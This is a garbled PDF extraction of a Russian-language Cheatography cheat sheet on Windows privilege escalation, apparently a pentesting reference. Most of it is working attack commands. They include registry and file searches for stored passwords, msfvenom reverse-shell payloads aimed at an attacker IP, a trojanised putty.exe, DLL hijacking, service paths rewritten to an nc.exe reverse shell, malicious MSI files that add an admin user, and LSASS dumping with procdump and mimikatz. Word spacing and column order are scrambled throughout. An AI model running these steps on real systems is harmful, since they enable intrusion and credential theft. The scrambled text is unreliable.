Windows Privilege Escalation v0.1 Cheat Sheet by Adisf via cheatography.com/37294/cs/12009/
Clear-text passwords Уязвимости по патчам
Содержимое файлов, в которых хранятся пароли для MS07-022 - KB931784 автораз вер тыв ания MS07-066 - KB943078 C:\un att end .xml MS08-064 - KB956841 %WIND IR% \Pa nth er\ Una tte nd\ Una tte nde d.xm l MS09-058 - KB971486 %WIND IR% \Pa nth er\ Una tte nde d.xm l MS10-015 - KB977165 C:\sy spr ep.inf - [Clear Text] MS10-021 - KB979683 MS10-059 - KB982799 C:\sy spr ep\ sys pre p.xm l - [Base64] MS10-092 - KB2305420 Файлы, которые также могут содержать пароли в зашифро ванном MS11-011 - KB2393802 виде в атрибуте cpassword MS11-080 - KB2592799 group .xml MS13-005 - KB2778930 Servi ces \Se rvi ces .xml CVE-201 3-3660 Sched ule dTa sks \Sc hed ule dTa sks .xml MS12-078 - KB2783534 Print ers \Pr int ers .xml MS13-053 - KB2778930 Drives\Drives.xml MS13-081 - KB2870008 DataS our ces \Da taS our ces .xml MS14-058 - KB3000061 Поиск различных файлов по маске MS14-068 - KB3011780 C:\> dir /s *pass* == *cred* == *vnc* == *.conf ig* MS14-070 - KB2989935 Поиск password в текстовых файлах MS15-001 - KB3023266 C:\> findstr /si password *.txt | *.xml | *.ini MS15-051 - KB3057191 C:\> findstr /si pass *.txt | *.xml | *.ini MS15-052 - KB3050514 Поиск password в реестре KiTrap0D - KB979682 C:\> reg query HKLM /s | findstr /i password > temp.txt C:\> reg query HKCU /s | findstr /i password > temp.txt Using accessc hk.exe C:\> reg query HKLM /f password /t REG_SZ /s Автомат ически принять пользов ате льское соглашение C:\> reg query HKCU /f password /t REG_SZ /s C:\> acces sch k.exe /accept eula Пароль автологина Поиск директорий с правами на запись C:\> reg query "H KLM \So ftw are \Mi cro sof t\ Windows C:\> acces sch k.exe -uwdqs Пользов атели C:\ NT\Curr ent ver sio n\ Winl ogo n" C:\> acces sch k.exe -uwdqs "A uth ent icated Users" C:\ Поиск файлов с правами на запись PSexec C:\> acces sch k.exe -uwqs Пользов атели c:\*.*
В Linux'е C:\> acces sch k.exe -uwqs "A uth ent icated Users" c:\*.* $ psexe c.py
By Adisf Not published yet. Sponsored by Readability-Score.com cheatography.com/adisf/ Last updated 9th June, 2017. Measure your website readability! Page 1 of 6. https://readability-score.com Windows Privilege Escalation v0.1 Cheat Sheet by Adisf via cheatography.com/37294/cs/12009/
WMIC (Win 7/8 -- XP requires admin) Vulnerable EXE Permiss ions
Установ ленные патчи Если есть доступ на запись к исполня емым файлам, то можно C:\> wmic qfe get Caption ,De scr ipt ion ,Ho tFi xID ,In sta lle dOn подсунуть свой файл и при запуске админис тра тором этого файла Поиск из установ ленных патчей нужного получим шелл. Можно объединить исполня емый файл с нагрузкой с C:\> wmic qfe get Caption ,De scr ipt ion ,Ho tFi xID ,In sta lledOn | findstr помощью метаспл оита. /C:"K B.." /C:"K B.." msf> msfvenom -a x86 --platform windows -x putty.exe -k -p windows /me ter pre ter /re ver se_tcp lhost=1 92.168 .1.101 -e
Эксплоиты exploitdb x86/shi kat a_g a_nai -i 3 -b "\ x00 " -f exe -o puttyX.exe
350,pla tfo rms /wi ndo ws/ loc al/ 350 .c, "MS Windows 2000 Utility Manager PowerSp loit Privilege Elevation Exploit (MS04-0 19) ",20 04- 07- 14, "Cesar Cerrudo ",wi ndo ws, loc al,0 https:/ /gi thu b.co m/ Pow erS hel lMa fia /Po wer Sploit 351,pla tfo rms /wi ndo ws/ loc al/ 351 .c, "MS Windows 2K POSIX Subsystem А точнее скрипт Privilege Escalation Exploit (MS04-0 20) ",20 04- 07- https:/ /gi thu b.co m/ Pow erS hel lMa fia /Po wer Spl oit /tr ee/ mas ter /Pr ivesc 17, bkb ll, win dow s,l ocal,0 Get-S erv ice Unq uot ed найдет все сервисы без кавычек и с 1198,pl atf orm s/w ind ows /lo cal /11 98.c," MS Windows CSRSS Local пробелами в полном путе Privilege Escalation Exploit (MS05-0 18) ",20 05- 09- Get-S erv ice Per ms перечислит все сервисы, на модифик ацию 06, eya s,w ind ows ,lo cal,0 которых имеет право текущий пользов атель 1407,pl atf orm s/w ind ows /lo cal /14 07.c," MS Windows 2k Kernel APC Data- Get-S erv ice EXE Per ms проверит все исполня емые файлы сервисов Free Local Escalation Exploit (MS05-0 55) ",20 06- 01- и вернет файлы, на которые пользов атель имеет право на запись 05, SoB eIt ,wi ndo ws, loc al,0 Invok e-S erv ice Use rAdd включае т/о ста нав ливает сервис, 1911,pl atf orm s/w ind ows /lo cal /19 11.c," MS Windows XP/2K (Mrxsmb .sys) реконфи гур ирует его, добавляя с его помощью локального Privilege Escalation PoC (MS06-0 30) ",20 06- 06- 14, "Ruben Santamarta пользов ателя и добавляя его в группу админис тра торов, рестартует ", win dow s,l ocal,0 и т.д. 2412,pl atf orm s/w ind ows /lo cal /24 12.c," MS Windows (Windows Kernel) Write -Us erA ddS erv ice Bin ary создает скомпил иро ванный C# Privilege Escalation Exploit (MS06-0 49) ",20 06- 09- бинарник и бинарный патч, добавля ющий пользов ателя. 21, SoB eIt ,wi ndo ws, loc al,0 Write -Se rvi ceE XE записывает бинарник в указанный путь сервиса и 3688,pl atf orm s/w ind ows /lo cal /36 88.c," MS Windows GDI Local Privilege возвращает оригина льные .exe Escalation Exploit (MS07-0 17) ",20 07- 04- 08, Iva nle f0u ,wi ndo ws, loc al,0 Invok e-F ind DLL Hij ack является портиро ванной версией Mandiant’s 3755,pl atf orm s/w ind ows /lo cal /37 55.c," MS Windows GDI Local Privilege FindDLL Hij ack. Проверяет все запущенные процессы и их Escalation Exploit (MS07-017) 2",20 07- 04- 17, "Lionel загруже нные модули и возвращает все hijacka ble -пути, т.е. путь к exe d'Hauen ens ",wi ndo ws, loc al,0 и модуль, которых не существ ует. 3804,pl atf orm s/w ind ows /re mot e/3 804 .tx t," MS Windows (.ANI) GDI Invok e-F ind Pat hDL LHi jack ищет потенци ально hijackable службы. Remote Elevation of Privilege Exploit (MS07-0 17) ",20 07- 04- 26, "Lionel DLL пути из %PATH%. Подробнее d'Hauen ens ",wi ndo ws, rem ote,0 http:// www .gr eyh ath ack er.net /?p =738 5518,pl atf orm s/w ind ows /lo cal /55 18.txt ,"MS Windows XP SP2 Get-R egA lwa ysI nst all Ele vat ed проверяет включен ли ключ реестра (win32k .sys) Privilege Escalation Exploit (MS08-0 25) ",20 08- 04- 28, "Ruben Santamarta ", win dow s,l ocal,0 AlwaysInstallElevated 14611,p lat for ms/ win dow s/d os/ 146 11.c," M icr osoft Windows Write-UserAddMSI может затем создать MSI, который добавит 'SfnLOG ONN OTIFY' Local Privilege Escalation Vulnera bility пользов ателя с админскими правами (MS10-0 48) ",20 10- 08- 10, MJ0 011 ,wi ndo ws, dos,0 Get-U nat ten ded Ins tal lFi les поиск файлов автомат иче ской 18176,p lat for ms/ win dow s/l oca l/1 817 6.py ," W indows Afd.sys - Privilege установки .xml, которые могут содержать какие-либо учетные Escalation Exploit (MS11-0 80) ",20 11- 11- 30, ryu jin ,wi ndo ws, loc al,0 данные 21844,p lat for ms/ win dow s/l oca l/2 184 4.rb ," M S11 -080 AfdJoin Leaf Privilege Get-R egA uto Log on извлекает данные автологина из реестра Escalat ion ",20 12- 10- 10, met asp loi t,w ind ows ,lo cal,0 27296,p lat for ms/ win dow s/l oca l/2 729 6.rb ," M S13 -005 HWND_BR OAD CAST Low to Medium Integrity Privilege Escalat ion ",20 13- 08- 02, met asp loi t,w ind ows ,lo cal,0
By Adisf Not published yet. Sponsored by Readability-Score.com cheatography.com/adisf/ Last updated 9th June, 2017. Measure your website readability! Page 2 of 6. https://readability-score.com Windows Privilege Escalation v0.1 Cheat Sheet by Adisf via cheatography.com/37294/cs/12009/
PowerSp loit (cont) DLL Hijacking (cont)
Invok e-A llC hec ks запустит все проверки на повышение привилегий Проанал изи ровать можно с помощью ProcMon с установ лен ными фильтрами
Insecure Registry Permiss ions Process Name is Vulnera ble .exe Result is NAME NOT FOUND Ошибки в правах на ветки реестра тоже могут помочь повысить Path ends with .dll привиле гии, для проверки использ уется программа SubInACL Теперь нужно найти папку с правами на запись. Часто в корне диска C:\> subin acl .exe /keyreg C: установ лены программы, к которым имеют доступ "H KEY _LO CAL _MA CHI NE\ SYS TEM \Cu rre ntC ont rol Set \Se rvi ces \Vu lne аутенти фиц иро ванные пользов атели (python27) rable Service " /display Проверим права Если можем изменять ключ реестра, то выполним C:\> acces sch k.exe -dqv "C :\ Pyth on2 7" C:\> reg add C:\> icacls C:\Pyth on27 "H KEY _LO CAL _MA CHI NE\ SYS TEM \Co ntr olS et0 01\ Ser vic es\ Vul ner able Аутенти фиц иро ванные пользов атели имеют права на модифик ацию Service " /t REG_EXP AND_SZ /v ImagePath /d Создадим простой реверс- шелл "C :\ User s\ test use r\ AppD ata \Lo cal \Te mp\ Pay loa d.ex e" /f root@ka li~# msfvenom -p windows /x6 4/m ete rpr ete r/r eve rse _tcp lhost=1 92.168 .2.60 lport=8989 -f dll > hijacka ble .dll
DLL Hijacking Загрузим meterpr ete r> upload -f hijacka ble .dll Статья, которая хорошо описывает данную уязвимость Скопируем наш DLL в папку с python27 *When an applica tion dynamic ally loads a dynamic -link library without C:\> copy hijacka ble .dll C:\Pyth on2 7\ wlbs ctr l.dl l specifying a fully qualified path name, Windows attempts to locate the DLL Процесс IKEEXT (“IKE and AuthIP IPsec Keying Modules”) пытается by searching a well-de fined set of directo ries in a particular order, as загрузить wlbsctr l.dll, который отсутст вует в конфигу рации системы described in Dynamic -Link Library Search Order. If an attacker gains по-умол чанию (Vista, 2008, 7, 8), а так как папка C:\pyth on27 имеется control of one of the directo ries on the DLL search path, it can place a в PATH, то эта библиотека будет подгружена при запуске этого malicious copy of the DLL in that directory. This is sometimes called a DLL сервиса (после перезаг рузки системы) preloading attack or a binary planting attack. If the system does not find a C:\> sc qc IKEEXT legitimate copy of the DLL before it searches the comprom ised directory, it loads the malicious DLL. If the applica tion is running with adminis trator privile ges, the attacker may succeed in local privilege elevati on.*. Ссылки Порядок проверки следующий https:/ /pe nte st.blo g/w ind ows -pr ivi leg e-e sca lat ion -me tho ds- for -pe nte sters/ 1) Директо рия, из которой запущено приложе ние. https:/ /xa kep .ru /20 14/ 12/ 24/ hac k-a dmi n-r ules/ 2) Системная директория для 32-битных приложений http:// www .fu zzy sec uri ty.com /tu tor ial s/1 6.html (C:\Win dow s\ Syst em32). http:// www .fu zzy sec uri ty.com /tu tor ial s/1 8.html 3) Системная директория для 16-битных приложений http:// www .gr eyh ath ack er.net /?p =738 (C:\Win dow s\ Syst em). 4) Папка C:\Wind ows. Metasploit 5) Текущая папка. 6) Директо рии, указанные в переменной окружения PATH. Можно оставить в системе свой сертификат чтобы при перехватах Для эксплуа тации нам надо найти директорию откуда загружа ется трафика или при запуске некоторых приложений с проверкой DLL и подсунуть свою уровнем выше. издателя не выходило предупр ежд ений Так как мы не можем видеть какие библиотеки подгруж аются, post/wi ndo ws/ man age /in jec t_ca скачиваем себе исполня емый файл и анализи руем его. Нас интересует LoadLib raryW
By Adisf Not published yet. Sponsored by Readability-Score.com cheatography.com/adisf/ Last updated 9th June, 2017. Measure your website readability! Page 3 of 6. https://readability-score.com Windows Privilege Escalation v0.1 Cheat Sheet by Adisf via cheatography.com/37294/cs/12009/
Сбор информации Управление сервисами
Информация о системе Создание и запуск сервиса C:\> syste min fo C:\> sc create
Информация о сети Эксплоиты в Metasploit
Сетевые адаптеры exploit /wi ndo ws/ loc al/ alw ays _in sta ll_ ele vated - excellent Windows C:\> ipconfig /all AlwaysI nst all Ele vated MSI
Маршруты exploit /wi ndo ws/ loc al/ byp ass uac _in jec tion - excellent Windows Escalate C:\> route print UAC Protection Bypass (In Memory Injection) ARP-таб лица exploit /wi ndo ws/ loc al/ ms1 0_0 15_ kit rap0d - great Windows SYSTEM C:\> arp -A Escalation via KiTrap0D Сетевые соединения с PID exploit /wi ndo ws/ loc al/ ms1 0_0 92_ sch ele vator - excellent Windows C:\> netstat -ano Escalate Task Scheduler XML Privilege Escalation Сетевые соединения с именем процесса exploit /wi ndo ws/ loc al/ ms1 1_0 80_ afd joi nleaf - average MS11-080 C:\> netstat -anb - Требует повышения AfdJoin Leaf Privilege Escalation exploit /wi ndo ws/ loc al/ ms1 3_0 05_ hwn d_b roa dcast - excellent MS13-005 Фаервол (только Win XP SP2+) HWND_BR OAD CAST Low to Medium Integrity Privilege Escalation C:\> netsh firewall show state exploit /wi ndo ws/ loc al/ ms1 3_0 53_ sch lam perei - average Windows C:\> netsh firewall show config NTUserM ess age Call Win32k Kernel Pool Overflow (Schlam perei) Пароль Wi-Fi exploit /wi ndo ws/ loc al/ ms1 3_0 81_ tra ck_ pop up_ menu - average Windows C:\> netsh wlan export profile key=cle ar TrackPo pup MenuEx Win32k NULL Page exploit /wi ndo ws/ loc al/ ms1 3_0 97_ ie_ reg ist ry_ sym link - great MS13-097 Кросскомпиляция Registry Symlink IE Sandbox Escape
Компиляция с помощью wine exploit /wi ndo ws/ loc al/ ms1 4_0 09_ ie_ dfsvc - great MS14-009 .NET $ cp /usr/sh are /ex plo itd b/p lat for ms/ win dow s/l oca l/< exp loi t>.c /tmp/ Deployment Service IE Sandbox Escape exploit /wi ndo ws/ loc al/ ms_ ndp roxy - average MS14-002 Microsoft $ cd /root/.win e/d riv e_c /Mi nGW /bin Windows ndproxy .sys Local Privilege Escalation $ wine gcc -o w00t.exe /tmp/
By Adisf Not published yet. Sponsored by Readability-Score.com cheatography.com/adisf/ Last updated 9th June, 2017. Measure your website readability! Page 4 of 6. https://readability-score.com Windows Privilege Escalation v0.1 Cheat Sheet by Adisf via cheatography.com/37294/cs/12009/
Эксплоиты в Metasploit (cont) Vulnerable Service Permission (cont) exploit /wi ndo ws/ loc al/ vir tua l_b ox_ gue st_ add itions - average VirtualBox Можно проверить с помощью accessc hk.exe и SC Guest Additions VBoxGue st.sys Privilege Escalation Пример (SSDPSRV в win xp sp0-1) post/wi ndo ws/ esc alate - Also look at these post exploit ation modules... sc config [servic e_n ame] binpath= "C :\ nc.exe -nv [RHOST] [RPORT] - e C:\WIND OWS \Sy ste m32 \cm d.ex e" Trusted Path Escalation sc config [servic e_n ame] obj= ".\Lo cal Sys tem " password= "" sc qc [servic e_n ame] (to verify!) Если путь указан без кавычек и содержит пробел, то этим можно net start [servic e_n ame] восполь зов аться. Модуль метаспл оита: Например, путь C:\To ols \Cu stom Tools\ prog ram .exe может service_permissions Некоторые известные уязвимые сервисы интерпр ети ров аться как C:\To ols \Cu sto m.ex e с параметром Windows XP with sp2 Tools \pr ogr am.exe * - As Power User: Имея права на запись в C:\To ols мы можем создать файл * service: DcomLaunch ( SYSTEM ) C:\To ols \Cu sto m.ex e, который и будет выполнен * Service: UpnpHost ( Local Service ) Модуль метаспл оита: trust ed_ ser vic e_p ath * Service: SSDPSRV (Local Service) Поиск с помощью WMIC * Service: WMI (SYSTEM) <- sometimes as user also.. C:\> wmic service get name,displayname,pathname,startmode * - As User: |findstr /i "A uto " | findstr /i /v "C :\ Wind ows \\ " |findstr /i /v "" " * Service: UpnpHost ( Local Service ) Порядок выполне ния, который проверяет система * Service: SSDPSRV (Local Service) C:\Prog ram .exe * - As Network Config Operators:
C:\Program Files.exe * service: DcomLaunch ( SYSTEM ) C:\Program Files (x86)\ Prog ram .exe * Service: UpnpHost ( Local Service ) C:\Program Files (x86)\ Program Folder\ A.exe * Service: SSDPSRV (Local Service) C:\Program Files (x86)\ Program Folder\A Subfold er\ Exe cut abl e.exe * Service: DHCP ( SYSTEM ) Проверить права на папку * Service: NetBT (SYSTEM - .sys driver) C:\> icacls "C :\ Program Files (x86)\ Program Folder" * Service DnsCache (SYSTEM) Интерес ующие права Windows 2000 F = Full Control * - As Power user CI = Container Inherit – означает что все контейнеры наследуют этот * service: WMI (SYSTEM) флаг. Third Part software (local & remote code execution) OI = Object Inherit – все файлы наследуют этот флаг * Service: [Pml Driver HPZ12] (HP Software - При запуске сервиса он почти сразу умирает, так как при запуске он C:\WINN T\ syst em3 2\ spoo l\ DRIV ERS \W3 2X8 6\ 3\HP Zip m12 .exe) должен общаться с Service Control Manager, а так как SCM не * -Granted Full Control to Everyone Group. получает даных, то считает что что-то не так и убивает процесс, * Service: [Autodesk Licensing Service] (Autocad - C:\program поэтому надо как только получили сессию мигриро вать meterpr eter на files\ Common files\ Auto desk Shared\ Ser vic e\ Adsk ScS rv.exe) другой процесс. * -Maybe related to: http:// www .se cur ity foc us.com /bi d/1 6472 * -Autodesk Multiple Products Remote Unautho rized Access Vulnera bility Vulnerable Service Permission
Проверяем имеет ли текущий пользов атель права на редакти ров ание сервиса. Редакти руем путь к исполня емому файлу сервиса на команду добавления пользов ателя или на свой шелл.
By Adisf Not published yet. Sponsored by Readability-Score.com cheatography.com/adisf/ Last updated 9th June, 2017. Measure your website readability! Page 5 of 6. https://readability-score.com Windows Privilege Escalation v0.1 Cheat Sheet by Adisf via cheatography.com/37294/cs/12009/
AlwaysI nst all Ele vated Removed autorun programms (cont)
Нас интересуют ключи Этой ситуацией также можно восполь зов аться для расширения [HKEY_C URR ENT _US ER\ SOF TWA RE\ Pol ici es\ Mic ros oft \Wi ndo ws\ Ins tal le своих полномочий. Первым делом надо найти все такие r] осироте вшие записи. Например, при помощи утилиты autorunsc от “Always Ins tal lEl eva ted ”=d wor d:0 000 0001 Sysinte rnals.. C:\> autor uns c.exe -a | findstr /n /R "F ile\ not\ found" [HKEY_L OCA L_M ACH INE \SO FTW ARE \Po lic ies \Mi cro sof t\ Wind ows \In sta lle r] Mimikatz и procdump “Always Ins tal lEl eva ted ”=d wor d:0 000 0001 которые позволяют любому установить msi с повышен ными Сначала получим дамп процесса LSASS. Можно это сделать с привиле гиями помощью mimikatz, но с ProcDump можно не беспоко иться о C:\> reg query предупр ежд ениях антивир усов C:\> procd ump .exe -accept eula -ma lsass.exe lsass.dm p HKCU\SO FTW ARE \Po lic ies \Mi cro sof t\ Wind ows \In sta ller /v После получения дампа можно скормить его mimikatz и получить AlwaysI nst all Ele vat ed пароли C:\> reg query C:\Mimi kat z\ x32> mimik atz .exe HKLM\SO FTW ARE \Po lic ies \Mi cro sof t\ Wind ows \In sta ller /v mimikatz# sekur lsa ::m ini dump C:\User s\ Fuba r\ Desk top \ls ass .dmp AlwaysI nst all Ele vat ed mimikatz# sekur lsa ::t spkg Если выйдет ошибка, то политика отключена, но если установлен Таким образом можно получить пароли пользов ате лей, которые параметр, то мы можем это использ овать недавно авториз овы вались root@ka li:~# msfvenom -f msi-nouac -p windows /ad duser Некоторые возможн ости mimikatz USER=ev ila dmin PASS=P4 ssw 0rd@ -o add_use r.ms i wdigest (пароли AD) Или без добавления пользов ателя kerberos (хэши LM/NTLM) root@ka li:~# msfvenom -p windows /me ter pre ter /re ver se_tcp -e oss (пароли Outlook) x86/shi kat a_g a_nai LHOST=1 92.168 .2.60 LPORT=8989 -f exe -o livessp (windows 8 пароль) Payload.exe msv ( AD) пароль root@ka li:~# msfvenom -f msi-nouac -p windows /exec tspkg (пароль AD) cmd="C:\ Use rs\ tes tus er\ App Dat a\ Loca l\ Temp \Pa ylo ad.exe " > malicio us.msi PowerShell
AD DNS-zone transfer Privilege Escalation with Task Scheduler PS C:\> Get-Wmi Object -Comput erName dc1 -Namespace Работает только на Windows 2000, XP, или 2003. В этих системах root\mi cro sof tDNS -Class Microso ftD NS_ Res our ceR ecord -Filter задачи по расписанию выполня ются с системными правами. "d oma inn ame =ur iit .lo cal " | select textrep res ent ation root@ka li:~# msfvenom -p windows /me ter pre ter /re ver se_tcp -e x86/shi kat a_g a_nai LHOST=1 92.168 .2.60 LPORT=8989 -f exe -o Payload .exe C:\> net start "Task Schedul er" C:\> at 06:42 /intera ctive "C :\ Docu ments and Setting s\ test \Local Setting s\ Temp \Pa ylo ad.exe " Утилита schtasks позволяет вешать задачи на определ енные события. Наиболее интересные для нас — ONIDLE, ONLOGON и ONSTART
Removed autorun programms
Очень часто случается, что система хранит запись о файле, который надо автомат ически запустить, даже после того, как сам файл уже канул в Лету. Может, какой-то сервис был некорре ктно удален — исполня емого файла нет, а запись в реестре осталась, и при каждом запуске система безуспешно пытается его стартан уть, забивая журнал событий сообщен иями о фейлах.
By Adisf Not published yet. Sponsored by Readability-Score.com cheatography.com/adisf/ Last updated 9th June, 2017. Measure your website readability! Page 6 of 6. https://readability-score.com